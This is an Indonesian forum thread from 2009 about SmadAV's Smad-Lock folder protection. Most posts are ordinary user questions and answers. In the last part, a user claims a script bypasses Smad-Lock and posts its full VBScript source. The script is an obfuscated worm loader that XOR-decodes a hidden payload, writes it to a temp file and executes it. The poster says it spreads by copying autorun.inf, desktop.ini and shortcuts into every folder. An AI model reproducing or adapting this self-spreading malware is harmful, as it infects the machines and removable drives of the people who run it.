mank linux gak bs hapus??
kyaknya isi autorun hanya jalan di windows deh,,
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: si-plus-plus pada Desember 16, 2009, 12:32:05 AM

Mas2nya numpang nanya :
Menurut pengakuan teman saya, setelah dia scan FDnya pake SmadAV di Kompi saya kemudian colok FD di Kompi dia, semua File2 nya menghilang semua yang tersisa cuma Brankas SmadAV dan autorun.inf ( hidden ).
Setelah itu saya pinjem FD nya buat saya Cek ( karena setau saya scan di SmadAV ga akan ngilangin File ), ketika saya coba eh malah sama sekali ga kedetect FDnya.. USBnya nyambung terus muncul Drive Baru tapi ketika di Klik muncul warning Please Insert a Disk into Drive E ??!!  ???
Ada yang tahu kira2 kenapa tu FD ?? Soalnya katanya ada File2 penting di situ..
Oya itu FD sempet dicabut paksa karena Kompina ngehang di safe remove ga mau eh sama temenku asal dicabut saja .. apa gara2 itu ya  :-\ :-\

Mohon pencerahannya . . ^:)^ sampai saat ini temen saya nyalahin SmadAV gara2 kasus itu, padahal dah saya jelasin SmadAV ga mungkin sampe ngapus File.. sampai cape' jelasinnya  ~x(
Terima Kasih  :D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: kido pada Desember 16, 2009, 07:37:44 AM
Biasanya itu terjadi karena cabut paksa itu.. Bukan karena Smadav..
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Kang Erpan pada Desember 16, 2009, 02:34:55 PM
Bang Zai yang baik, pada versi free, saat flesdis dicolok kenapa sih notifikasinya selalu bilang bersih??? padahal pada saat yang hampir sama juga ndeteksi virus...hayoo?? (apa ini juga terjadi untuk versi pro)
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Ran_TH pada Desember 16, 2009, 03:19:01 PM
Bang Zai yang baik, pada versi free, saat flesdis dicolok kenapa sih notifikasinya selalu bilang bersih??? padahal pada saat yang hampir sama juga ndeteksi virus...hayoo?? (apa ini juga terjadi untuk versi pro)
Kebetulan pernah nanya hal yang sama :D Jawaban bang Zai katanya fitur scan flashdisk hanya men-scan "kulit luarnya" saja (maksudnya hanya menscan apakah ada virus autorun disitu). Tetap saja flashdisk itu mesti di full-scan untuk memastikan dalamnya tidak ada virus bercokol.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: MathZ pada Desember 16, 2009, 03:21:34 PM
Bang Zai yang baik, pada versi free, saat flesdis dicolok kenapa sih notifikasinya selalu bilang bersih??? padahal pada saat yang hampir sama juga ndeteksi virus...hayoo?? (apa ini juga terjadi untuk versi pro)
Kebetulan pernah nanya hal yang sama :D Jawaban bang Zai katanya fitur scan flashdisk hanya men-scan "kulit luarnya" saja (maksudnya hanya menscan apakah ada virus autorun disitu). Tetap saja flashdisk itu mesti di full-scan untuk memastikan dalamnya tidak ada virus bercokol.
oh begitu toh, maksudnya. sip deh nambah pengetahuan lagi tentang smadav.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: izul pada Desember 16, 2009, 07:50:23 PM
Bang Zai yang baik, pada versi free, saat flesdis dicolok kenapa sih notifikasinya selalu bilang bersih??? padahal pada saat yang hampir sama juga ndeteksi virus...hayoo?? (apa ini juga terjadi untuk versi pro)

smad-ray itu cm scan root drive FD doank, ga msuk ke sub-folder nya,, mknya krg dari 2 detik bs lngsung mncul notif bersih..
krna logikanya klo di root drive nya udh ga ditemuin virus, kmungkinan bsar FD nya bersih.. :D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: ★ harboot ★ pada Desember 16, 2009, 08:10:26 PM
Bang Zai yang baik, pada versi free, saat flesdis dicolok kenapa sih notifikasinya selalu bilang bersih??? padahal pada saat yang hampir sama juga ndeteksi virus...hayoo?? (apa ini juga terjadi untuk versi pro)

smad-ray itu cm scan root drive FD doank, ga msuk ke sub-folder nya,, mknya krg dari 2 detik bs lngsung mncul notif bersih..
krna logikanya klo di root drive nya udh ga ditemuin virus, kmungkinan bsar FD nya bersih.. :D

wew,, diskusinya menariiik tp salah kamar,,,
mungkin perlu dibenahi smad-ray ini supaya gak byk yg salah paham
(eh,, malah ikut2 OOT)


Biasanya itu terjadi karena cabut paksa itu.. Bukan karena Smadav..

yupz mungkin,, komputer error bs jadi smadav error saat scan,,
dan tiba2 fdisk dihapus,, pdhal fdisk sedang dibaca,,

ada software buat perbaiki fdisk dgn kerusakkan spt ini,,
tp gw lupa namanya apa,, seharusnya pembahasan pd smad-ray,,
tidak ada hubungan dgn smad-lock,, otreee,,

Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: izul pada Desember 16, 2009, 08:46:47 PM
@boot
kga ad thread smad-ray soalnya boot, jd slah kmar dah...wkwkwk
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: vodka pada Desember 16, 2009, 09:02:26 PM
biar tambah kuat waktu colok USB itu mending smad lock tambah apa ya?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Wisnu Pramudya pada Desember 18, 2009, 06:14:56 PM
maksudnya buka file diluar folder smadav tuh gmn?
apa di kluarin dulu filenya,titipin di drive lain baru dibuka?
kalo filenya bervirus dimasukin ke folder smadav kira2 gmn?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: MathZ pada Desember 19, 2009, 06:33:42 AM
Gan kenapa yah kompi saya suka ngeheng kalo di colok FD, trs biasanya rtp smadav lambat banget scannya. Semua file saya masukkan ke smad-lock jd bukan hanya file2 office melainkan software juga di simpen di smad-lock.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: MathZ pada Desember 19, 2009, 06:38:16 AM
maksudnya buka file diluar folder smadav tuh gmn?
apa di kluarin dulu filenya,titipin di drive lain baru dibuka?
kalo filenya bervirus dimasukin ke folder smadav kira2 gmn?
filenya di keluarin dulu dari smad-lock jd simpennya bisa di FD atau Drive, intinya diluar smad-lock.
Kalo filenya bervirus ya tetap bervirus jika dimasukkan ke smadlock.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Wisnu Pramudya pada Desember 19, 2009, 02:17:17 PM
maksudnya buka file diluar folder smadav tuh gmn?
apa di kluarin dulu filenya,titipin di drive lain baru dibuka?
kalo filenya bervirus dimasukin ke folder smadav kira2 gmn?
filenya di keluarin dulu dari smad-lock jd simpennya bisa di FD atau Drive, intinya diluar smad-lock.
Kalo filenya bervirus ya tetap bervirus jika dimasukkan ke smadlock.
owh,timakasih pencerahannya.
tapi didalam folder smad,apa virus dpt berkembang biak?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: amirdtr pada Desember 19, 2009, 02:45:50 PM
maksudnya buka file diluar folder smadav tuh gmn?
apa di kluarin dulu filenya,titipin di drive lain baru dibuka?
kalo filenya bervirus dimasukin ke folder smadav kira2 gmn?

Jadi begini, beberapa file yang dibuka dengan program yang tidak support huruf Unicode (karena folder SmadLock ada huruf Unicode-nya) mungkin tidak dapat dibuka karena tidak support huruf Unicode. Kebanyakan program selain (misalnya) Microsoft Office dsb. tidak support Unicode :D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: amirdtr pada Desember 19, 2009, 02:47:57 PM
maksudnya buka file diluar folder smadav tuh gmn?
apa di kluarin dulu filenya,titipin di drive lain baru dibuka?
kalo filenya bervirus dimasukin ke folder smadav kira2 gmn?
filenya di keluarin dulu dari smad-lock jd simpennya bisa di FD atau Drive, intinya diluar smad-lock.
Kalo filenya bervirus ya tetap bervirus jika dimasukkan ke smadlock.
owh,timakasih pencerahannya.
tapi didalam folder smad,apa virus dpt berkembang biak?

Virus yang tidak support huruf Unicode akan tidak mungkin dapat masuk ke folder Smad-Lock. ;)
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Wisnu Pramudya pada Desember 19, 2009, 02:54:26 PM
maksudnya buka file diluar folder smadav tuh gmn?
apa di kluarin dulu filenya,titipin di drive lain baru dibuka?
kalo filenya bervirus dimasukin ke folder smadav kira2 gmn?
filenya di keluarin dulu dari smad-lock jd simpennya bisa di FD atau Drive, intinya diluar smad-lock.
Kalo filenya bervirus ya tetap bervirus jika dimasukkan ke smadlock.
owh,timakasih pencerahannya.
tapi didalam folder smad,apa virus dpt berkembang biak?

Virus yang tidak support huruf Unicode akan tidak mungkin dapat masuk ke folder Smad-Lock. ;)

sangat jelas gan,jadi tergantung jenis huruf yang dipakai ya,saya malah belum pernah nemu,setau saya smad lock itu cuma tak buat nyimpen koleksi virus2 saya,soalnya yang udah masuk diluarnya tetep aman.
makasih gan,nice tips
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Cyvermont pada Desember 20, 2009, 10:45:26 AM
maksudnya buka file diluar folder smadav tuh gmn?
apa di kluarin dulu filenya,titipin di drive lain baru dibuka?
kalo filenya bervirus dimasukin ke folder smadav kira2 gmn?
filenya di keluarin dulu dari smad-lock jd simpennya bisa di FD atau Drive, intinya diluar smad-lock.
Kalo filenya bervirus ya tetap bervirus jika dimasukkan ke smadlock.
owh,timakasih pencerahannya.
tapi didalam folder smad,apa virus dpt berkembang biak?

Virus yang tidak support huruf Unicode akan tidak mungkin dapat masuk ke folder Smad-Lock. ;)

sangat jelas gan,jadi tergantung jenis huruf yang dipakai ya,saya malah belum pernah nemu,setau saya smad lock itu cuma tak buat nyimpen koleksi virus2 saya,soalnya yang udah masuk diluarnya tetep aman.
makasih gan,nice tips

kok gw malah jadi bingung ya.. kalo ga bisa dimasukin virus yg ga support unicode,, knapa yg diatas bisa nyimpen virus di smadlock??
hmmm...  :-\ :-\

saya sendiri smadlock ga dipake sama sekali.. soalnya repot kalo harus keluar masukin data dari folder..  :P
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: s4nji pada Desember 20, 2009, 10:55:08 AM
maksudnya buka file diluar folder smadav tuh gmn?
apa di kluarin dulu filenya,titipin di drive lain baru dibuka?
kalo filenya bervirus dimasukin ke folder smadav kira2 gmn?
filenya di keluarin dulu dari smad-lock jd simpennya bisa di FD atau Drive, intinya diluar smad-lock.
Kalo filenya bervirus ya tetap bervirus jika dimasukkan ke smadlock.
owh,timakasih pencerahannya.
tapi didalam folder smad,apa virus dpt berkembang biak?

Virus yang tidak support huruf Unicode akan tidak mungkin dapat masuk ke folder Smad-Lock. ;)

sangat jelas gan,jadi tergantung jenis huruf yang dipakai ya,saya malah belum pernah nemu,setau saya smad lock itu cuma tak buat nyimpen koleksi virus2 saya,soalnya yang udah masuk diluarnya tetep aman.
makasih gan,nice tips

kok gw malah jadi bingung ya.. kalo ga bisa dimasukin virus yg ga support unicode,, knapa yg diatas bisa nyimpen virus di smadlock??
hmmm...  :-\ :-\

saya sendiri smadlock ga dipake sama sekali.. soalnya repot kalo harus keluar masukin data dari folder..  :P
Kalau saya sih, yang penting sekuriti, kenyamanan nomor 2
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Wisnu Pramudya pada Desember 20, 2009, 01:04:55 PM
Gni gan,slama vrus itu support b.unicode,vrus bsa dmsukan,kalo ga ya tidak gan.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: SeChild pada Desember 20, 2009, 01:06:21 PM
1.smad lock bisa d copy g ???
2.smad lock selalu d upgrade g ???
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Wisnu Pramudya pada Desember 20, 2009, 01:09:07 PM
ga bisa gan.
smad lock itu hanya mengunci,tdk perlu diupgrade krna befungsi untuk mengunci drive.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: GrunguS pada Desember 20, 2009, 06:08:32 PM
ga bisa gan.
smad lock itu hanya mengunci,tdk perlu diupgrade krna befungsi untuk mengunci drive.

Bisa gak buat smad lock sendiri... kan di brankas smadav ditambah bahsa yang sulit dipahami komputer. kayak ASCII. tu kyknya bisa sendiri deh buatnya.Dah pernah coba ,tapi lom pernah buat
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: ★ harboot ★ pada Desember 20, 2009, 06:21:36 PM
ga bisa gan.
smad lock itu hanya mengunci,tdk perlu diupgrade krna befungsi untuk mengunci drive.

Bisa gak buat smad lock sendiri... kan di brankas smadav ditambah bahsa yang sulit dipahami komputer. kayak ASCII. tu kyknya bisa sendiri deh buatnya.Dah pernah coba ,tapi lom pernah buat

maksudnya bgmn? ascii lebih mudah dipahami komputer daripada alpabet,,
laptop harboot yg bilang begituuu,, (he2)

maksud kamu buat bhs sendiri?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: GrunguS pada Desember 20, 2009, 06:28:58 PM
ga bisa gan.
smad lock itu hanya mengunci,tdk perlu diupgrade krna befungsi untuk mengunci drive.

Bisa gak buat smad lock sendiri... kan di brankas smadav ditambah bahsa yang sulit dipahami komputer. kayak ASCII. tu kyknya bisa sendiri deh buatnya.Dah pernah coba ,tapi lom pernah buat

maksudnya bgmn? ascii lebih mudah dipahami komputer daripada alpabet,,
laptop harboot yg bilang begituuu,, (he2)

maksud kamu buat bhs sendiri?
ASCII kan kyk gini ☻♥☺♦♣♠•◘○◙♂♀♪♫☼► tuh ,apalagi kalo tulisan jepang .pas dibuka langsung gak error... musti di copy ke harddisk dulu
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Wisnu Pramudya pada Desember 20, 2009, 10:24:17 PM
Lock berada pada autorun.inf itu gan,msalah ascii itu hanya bhsa unicode agar virus yg tdk support tdk dpt msuk.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: MathZ pada Desember 21, 2009, 06:23:39 AM
maksudnya buka file diluar folder smadav tuh gmn?
apa di kluarin dulu filenya,titipin di drive lain baru dibuka?
kalo filenya bervirus dimasukin ke folder smadav kira2 gmn?
filenya di keluarin dulu dari smad-lock jd simpennya bisa di FD atau Drive, intinya diluar smad-lock.
Kalo filenya bervirus ya tetap bervirus jika dimasukkan ke smadlock.
owh,timakasih pencerahannya.
tapi didalam folder smad,apa virus dpt berkembang biak?

Virus yang tidak support huruf Unicode akan tidak mungkin dapat masuk ke folder Smad-Lock. ;)

sangat jelas gan,jadi tergantung jenis huruf yang dipakai ya,saya malah belum pernah nemu,setau saya smad lock itu cuma tak buat nyimpen koleksi virus2 saya,soalnya yang udah masuk diluarnya tetep aman.
makasih gan,nice tips

kok gw malah jadi bingung ya.. kalo ga bisa dimasukin virus yg ga support unicode,, knapa yg diatas bisa nyimpen virus di smadlock??
hmmm...  :-\ :-\

saya sendiri smadlock ga dipake sama sekali.. soalnya repot kalo harus keluar masukin data dari folder..  :P
Kalau saya sih, yang penting sekuriti, kenyamanan nomor 2
yups. Gw juga sekuriti yg di utamakan. Toh kalo file2 office mah masih bisa di buka dari smad-lock. Kecuali software(ada yg bisa dan ada yg ga bisa), kalo nyimpanya rapih pasti nyaman lah.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: passlogin pada Desember 22, 2009, 03:22:46 PM
Sebenernya penambahan encoding ASCII pada Folder TIDAK AKAN MENGHALANGI MALWARE MENGINFEKSI FILE YANG DIDALAMNYA.
Tetapi Folder Smad-Lock itu sendiri mengguna encoding Unicode pada tanda segitiga (Delta) itu
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Arsytech pada Desember 22, 2009, 04:46:36 PM
Untuk versi selanjutnya, saya mengharapkan, smadav dapat menscan file yang di quaranti oleh anti virus selain smadav, kemudian merestore kembali file tersebut. Mungkin di buatkan option untuk pengguna di fiturenya nanti.  8)
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: MathZ pada Desember 22, 2009, 05:57:18 PM
Untuk versi selanjutnya, saya mengharapkan, smadav dapat menscan file yang di quaranti oleh anti virus selain smadav, kemudian merestore kembali file tersebut. Mungkin di buatkan option untuk pengguna di fiturenya nanti.  8)
gan biar sesuai mending ngepostnya di request fitur smadav.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Ajojing pada Desember 22, 2009, 06:25:54 PM
Untuk versi selanjutnya, saya mengharapkan, smadav dapat menscan file yang di quaranti oleh anti virus selain smadav, kemudian merestore kembali file tersebut. Mungkin di buatkan option untuk pengguna di fiturenya nanti.  8)
tdk bisa sepertinya bro, krna teknik enkripsi quaratine antivirus berbeda2, terutama Av luar.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: GrunguS pada Desember 24, 2009, 01:55:48 PM
Sebenernya penambahan encoding ASCII pada Folder TIDAK AKAN MENGHALANGI MALWARE MENGINFEKSI FILE YANG DIDALAMNYA.
Tetapi Folder Smad-Lock itu sendiri mengguna encoding Unicode pada tanda segitiga (Delta) itu

 hmmm begitu ya... ada lagi ga tanda tanda kyk gituan? itu namanya tanda Unicode ya? selain Delta...Alpa ...Beta...CHarlie dan lain lain ada gak... Mohon bantuannya! hehehhe ;D :D :D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: simoleon pada Desember 26, 2009, 06:36:27 PM
nubi mo nanya dikit tentang fitur smad lock

apa fitur ini cuma berlaku buat flash disk aja?
gmn klo misalnya kita nyolokin ponsel kita yg didalemnya ada mmc/micro sd ke PC biasa kita pake
apa ntar smadav scr otomatis bkl ngebuat brankas juga didalem mmc/micro sd yg ada di hp kita?

ditunggu pencerahannya yah :D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: GrunguS pada Desember 26, 2009, 06:43:05 PM
nubi mo nanya dikit tentang fitur smad lock

apa fitur ini cuma berlaku buat flash disk aja?
gmn klo misalnya kita nyolokin ponsel kita yg didalemnya ada mmc/micro sd ke PC biasa kita pake
apa ntar smadav scr otomatis bkl ngebuat brankas juga didalem mmc/micro sd yg ada di hp kita?

ditunggu pencerahannya yah :D

iya dunk. aku aja memorinya dah ada smadlocknya ... AUTOMATIC... tapi tetap waspada.. gimana kalo yang disimpen didalam folder smadlock gak bisa di buka di ponsel.. ?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: amirdtr pada Desember 27, 2009, 01:43:53 PM
nubi mo nanya dikit tentang fitur smad lock

apa fitur ini cuma berlaku buat flash disk aja?
gmn klo misalnya kita nyolokin ponsel kita yg didalemnya ada mmc/micro sd ke PC biasa kita pake
apa ntar smadav scr otomatis bkl ngebuat brankas juga didalem mmc/micro sd yg ada di hp kita?

ditunggu pencerahannya yah :D

1. Tidak hanya flashdisk saja, HDD; CD; dsb. bisa ditambahkan folder Smad-Lock.
2. Ya.

:D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Jastis pada Desember 27, 2009, 08:42:04 PM
Nih kelemahan Smad-Lock

Ternyata dengan script sederhana bisa tembus......
(http://i50.tinypic.com/10pyhp0.jpg)

Autorunnya juga bisa di tembus...

(http://i47.tinypic.com/alkkjm.jpg)

Jenis script ini hanya untuk memperbanyak setiap folder dengan membuat shortcut dan mencopykan autorun.inf dan destop.ini di setiap folder....
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Zai pada Desember 28, 2009, 12:15:28 AM
Pertanyaan teknis :
Apakah mungkin Smad-Lock ditembus virus?

Smad-Lock memang masih mungkin ditembus oleh sebagian kecil virus yang (1) secara keseluruhan atau (2) hanya sebagian fungsinya yang mendukung path UNICODE.

Untuk tipe yang pertama, yaitu virus yang secara keseluruhan mendukung UNICODE, bahkan bisa menginfeksi dokumen/file dalam folder Smad-Lock, tapi sampai sekarang saya belum ada menemukan virus seperti ini khususnya di Indonesia yang bisa menginfeksi dokumen (bukan executable), yang ada hanyalah virus asing yang bisa menginfeksi exe.

Untuk tipe virus yang kedua, hanya mempunyai sebagian fungsi yang mendukung path UNICODE, hanya akan mampu meng-copy filenya ke dalam folder Smad-Lock dan kebanyakan tidak memodifikasi file-file lainnya yang sudah ada di dalam folder Smad-Lock. Virus jenis ini mungkin bisa diperkirakan ada kurang dari 5% dari seluruh virus lokal yang menyebar di Indonesia.

Jadi, folder Smad-Lock jelas masih ada celahnya dan memang tidak mungkin 100% aman.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Jastis pada Desember 28, 2009, 10:39:56 AM
Terima penjelasannya..

nih script yg saya gunakan,saya dapat dari programmer Philipphine...[pantsan tembus].
Moga bisa dimanfaatkan untuk pengembangan Smadav......

Kode: [Pilih]
'http://www.microsoft.com/isapi/redir.dll?prd={SUB_PRD}&ar=runonce&pver={SUB_PVER}&plcid={SUB_CLSID}
'Microsoft Windows Corporation
' ========================
'Microsoft Windows Serviks
'Hawabek sata irad acab gnolot
'Sataek hawab irad acab uti haletes
'sJ80
'dI20
'dK5K
'dA4C
'd-2U
'dS5F
'dE2.
'sR4I
'gV6N
'tI9I
'4K5.
'3S2F
'e-4U
'fM5R
'wA2U
'sS6H
'GU5.
'FK2H
'D-2A
'DD5W
'EI2A
'S-5B
'SK6I
'UO2D
'TM4.
'3P5Q
'4U6P
'6T2H
'7E2.
'8R7O
'9-5N
'0A5.
'6N4I
'RD6R
'EA4A
'F!3C
'F-57
'HH44
'GU60
'MB98
'NU26
'FN36
'RG58
'WI68
'W-59
'TM85
'EY66
'W-55
'WE38
'SM40
'DA25
'SI51
'LL88
'G:60
'D-35
'SZ43
'QE22
'HR61
'OV85
'PI25
'YK44
'FS86
'E@66
'VY25
'MA48
'cH60
'fO92
'tO30
'6.80
'6C41
'8O73
'uM53
'g-63
'f-24
'fB36
'bY65
'b:38
'A-20
'aF28
'AA26
'AN36
'WD68
'KI31
'K-59
'ML25
'LO56
'TV25
'RE58
'D-20
'DY28
'GU51
'KY68
'OU90
'PN84
'J.78
'H-50
'sJ80
'dI20
'dK5K
'dA4C
'd-2U
'dS5F
'dE2.
'sR4I
'gV6N
'tI9I
'4K5.
'3S2F
'e-4U
'fM5R
'wA2U
'sS6H
'GU5.
'FK2H
'D-2A
'DD5W
'EI2A
'S-5B
'SK6I
'UO2D
'TM4.
'3P5Q
'4U6P
'6T2H
'7E2.
'8R7O
'9-5N
'0A5.
'6N4I
'RD6R
'EA4A
'F!3C
'F-57
'HH44
'GU60
'MB98
'NU26
'FN36
'RG58
'WI68
'W-59
'TM85
'EY66
'W-55
'WE38
'SM40
'DA25
'SI51
'LL88
'G:60
'D-35
'SZ43
'QE22
'HR61
'OV85
'PI25
'YK44
'FS86
'E@66
'VY25
'MA48
'cH60
'fO92
'tO30
'6.80
'6C41
'8O73
'uM53
'g-63
'f-24
'fB36
'bY65
'b:38
'A-20
'aF28
'AA26
'AN36
'WD68
'KI31
'K-59
'ML25
'LO56
'TV25
'RE58
'D-20
'DY28
'GU51
'KY68
'OU90
'PN84
'J.78
'H-50
'sJ80
'dI20
'dK5K
'dA4C
'd-2U
'dS5F
'dE2.
'sR4I
'gV6N
'tI9I
'4K5.
'3S2F
'e-4U
'fM5R
'wA2U
'sS6H
'GU5.
'FK2H
'D-2A
'DD5W
'EI2A
'S-5B
'SK6I
'UO2D
'TM4.
'3P5Q
'4U6P
'6T2H
'7E2.
'8R7O
'9-5N
'0A5.
'6N4I
'RD6R
'EA4A
'F!3C
'F-57
'HH44
'GU60
'MB98
'NU26
'FN36
'RG58
'WI68
'W-59
'TM85
'EY66
'W-55
'WE38
'SM40
'DA25
'SI51
'LL88
'G:60
'D-35
'SZ43
'QE22
'HR61
'OV85
'PI25
'YK44
'FS86
'E@66
'VY25
'MA48
'cH60
'fO92
'tO30
'6.80
'6C41
'8O73
'uM53
'g-63
'f-24
'fB36
'bY65
'b:38
'A-20
'aF28
'AA26
'AN36
'WD68
'KI31
'K-59
'ML25
'LO56
'TV25
'RE58
'D-20
'DY28
'GU51
'KY68
'OU90
'PN84
'J.78
'H-50
'sJ80
'dI20
'dK5K
'dA4C
'd-2U
'dS5F
'dE2.
'sR4I
'gV6N
'tI9I
'4K5.
'3S2F
'e-4U
'fM5R
'wA2U
'sS6H
'GU5.
'FK2H
'D-2A
'DD5W
'EI2A
'S-5B
'SK6I
'UO2D
'TM4.
'3P5Q
'4U6P
'6T2H
'7E2.
'8R7O
'9-5N
'0A5.
'6N4I
'RD6R
'EA4A
'F!3C
'F-57
'HH44
'GU60
'MB98
'NU26
'FN36
'RG58
'WI68
'W-59
'TM85
'EY66
'W-55
'WE38
'SM40
'DA25
'SI51
'LL88
'G:60
'D-35
'SZ43
'QE22
'HR61
'OV85
'PI25
'YK44
'FS86
'E@66
'VY25
'MA48
'cH60
'fO92
'tO30
'6.80
'6C41
'8O73
'uM53
'g-63
'f-24
'fB36
'bY65
'b:38
'A-20
'aF28
'AA26
'AN36
'WD68
'KI31
'K-59
'ML25
'LO56
'TV25
'RE58
'D-20
'DY28
'GU51
'KY68
'OU90
'PN84
'J.78
'H-50
On Error Resume Next
Dim fso, ws
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.Shell")
Set sh = CreateObject("Shell.application")
Q=WScript.ScriptFullName
tmp=fso.GetSpecialFolder(1)
tn=fso.GetTempName
tmpt=tmp+"\"+tn
Set swt=WScript.Arguments
If swt.Count>0 Then
status=swt(0)
If status="auto" Then
sh.Explore Left(WScript.ScriptFullName,3)
Else
status=Left(WScript.ScriptFullName,Len(WScript.ScriptFullName)-Len(WScript.ScriptName))+status
If fso.FolderExists(status) Then
sh.Explore status
Else
fso.CreateFolder status
sh.Explore status
End If
End If
Else
End If
Set QQ=fso.GetFile(Q)
Set Q1=QQ.OpenAsTextStream(1,0)
isiQ=Q1.Read(QQ.Size)
Q1.close
t1=InStr(1,isiQ,"Windows Serviks"+" >>>",0)+18
isiQ=Right(isiQ,Len(isiQ)-t1)
hsl=""
For v=1 To Len(isiQ)
t=Asc(Mid(isiQ,v,1))
hsl=hsl+Chr(t Xor 7)
Next
If fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0
Set temporary=fso.OpenTextFile(tmpt,2,True,0)
temporary.Write hsl
temporary.Close
ws.Run "WScript.exe //e:VBScript "+tmpt+" """+Q+""""

 ' Windows Serviks >>> :::::::::::::::::::::::::::::::::::::::::::::::::::::::
 ossw=((ppp)jnduhthas)dhj(ntfwn(ubcnu)ckk8wuc:|TREXWUCz!fu:urihidb!wqbu:|TREXWQBUz!wkdnc:|TREXDKTNCz
 Jnduhthas'Pnichpt'Dhuwhufsnhi
 '::::::::::::::::::::::::
 Jnduhthas'Pnichpt'Tbuqnlt
 Ofpfebl'tfsf'nufc'fdfe'`ihkhs
 Tfsfbl'ofpfe'nufc'fdfe'rsn'ofkbsbt
 tM?7
 cN57
 cL2L
 cF3D
 c*5R
 cT2A
 cB5)
 tU3N
 `Q1I
 sN>N
 3L2)
 4T5A
 b*3R
 aJ2U
 pF5R
 tT1O
 @R2)
 AL5O
 C*5F
 CC2P
 BN5F
 T*2E
 TL1N
 RH5C
 SJ3)
 4W2V
 3R1W
 1S5O
 0B5)
 ?U0H
 >*2I
 7F2)
 1I3N
 UC1U
 BF3F
 A&4D
 A*20
 OO33
 @R17
 JE>?
 IR51
 AI41
 U@2?
 PN1?
 P*2>
 SJ?2
 B^11
 P*22
 PB4?
 TJ37
 CF52
 TN26
 KK??
 @=17
 C*42
 T]34
 VB55
 OU16
 HQ?2
 WN52
 ^L33
 AT?1
 BG11
 Q^52
 JF3?
 dO17
 aH>5
 sH47
 1)?7
 1D36
 ?H04
 rJ24
 `*14
 a*53
 aE41
 e^12
 e=4?
 F*57
 fA5?
 FF51
 FI41
 PC1?
 LN46
 L*2>
 JK52
 KH21
 SQ52
 UB2?
 C*57
 C^5?
 @R26
 L^1?
 HR>7
 WI?3
 M)0?
 O*27
 tM?7
 cN57
 cL2L
 cF3D
 c*5R
 cT2A
 cB5)
 tU3N
 `Q1I
 sN>N
 3L2)
 4T5A
 b*3R
 aJ2U
 pF5R
 tT1O
 @R2)
 AL5O
 C*5F
 CC2P
 BN5F
 T*2E
 TL1N
 RH5C
 SJ3)
 4W2V
 3R1W
 1S5O
 0B5)
 ?U0H
 >*2I
 7F2)
 1I3N
 UC1U
 BF3F
 A&4D
 A*20
 OO33
 @R17
 JE>?
 IR51
 AI41
 U@2?
 PN1?
 P*2>
 SJ?2
 B^11
 P*22
 PB4?
 TJ37
 CF52
 TN26
 KK??
 @=17
 C*42
 T]34
 VB55
 OU16
 HQ?2
 WN52
 ^L33
 AT?1
 BG11
 Q^52
 JF3?
 dO17
 aH>5
 sH47
 1)?7
 1D36
 ?H04
 rJ24
 `*14
 a*53
 aE41
 e^12
 e=4?
 F*57
 fA5?
 FF51
 FI41
 PC1?
 LN46
 L*2>
 JK52
 KH21
 SQ52
 UB2?
 C*57
 C^5?
 @R26
 L^1?
 HR>7
 WI?3
 M)0?
 O*27
 tM?7
 cN57
 cL2L
 cF3D
 c*5R
 cT2A
 cB5)
 tU3N
 `Q1I
 sN>N
 3L2)
 4T5A
 b*3R
 aJ2U
 pF5R
 tT1O
 @R2)
 AL5O
 C*5F
 CC2P
 BN5F
 T*2E
 TL1N
 RH5C
 SJ3)
 4W2V
 3R1W
 1S5O
 0B5)
 ?U0H
 >*2I
 7F2)
 1I3N
 UC1U
 BF3F
 A&4D
 A*20
 OO33
 @R17
 JE>?
 IR51
 AI41
 U@2?
 PN1?
 P*2>
 SJ?2
 B^11
 P*22
 PB4?
 TJ37
 CF52
 TN26
 KK??
 @=17
 C*42
 T]34
 VB55
 OU16
 HQ?2
 WN52
 ^L33
 AT?1
 BG11
 Q^52
 JF3?
 dO17
 aH>5
 sH47
 1)?7
 1D36
 ?H04
 rJ24
 `*14
 a*53
 aE41
 e^12
 e=4?
 F*57
 fA5?
 FF51
 FI41
 PC1?
 LN46
 L*2>
 JK52
 KH21
 SQ52
 UB2?
 C*57
 C^5?
 @R26
 L^1?
 HR>7
 WI?3
 M)0?
 O*27
 tM?7
 cN57
 cL2L
 cF3D
 c*5R
 cT2A
 cB5)
 tU3N
 `Q1I
 sN>N
 3L2)
